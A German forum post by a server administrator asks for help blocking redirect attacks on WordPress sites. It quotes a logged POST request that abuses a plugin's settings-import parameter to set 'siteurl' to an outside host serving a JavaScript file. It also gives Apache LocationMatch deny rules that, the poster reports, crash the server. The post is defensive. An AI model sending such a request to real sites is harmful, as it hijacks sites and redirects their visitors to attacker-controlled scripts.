ich habe hier seit 4 Tagen alle möglichen Arten von redirect attacken auf Wordpress Installationen z.b.
Code: Alles auswählen
"POST /wp-admin/admin-post.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
Mein Versuch über LocationMatch zeigt im apache2ctl configtest zwar keine Fehler an, aber der Apache verabschiedet sich nach Einbau dieser Regeln:
Code: Alles auswählen
<LocationMatch "[nd_learning_option_value]">
Order Deny,Allow
Deny from all
</LocationMatch>
<LocationMatch "[*]">
Order Deny,Allow
Deny from all
</LocationMatch>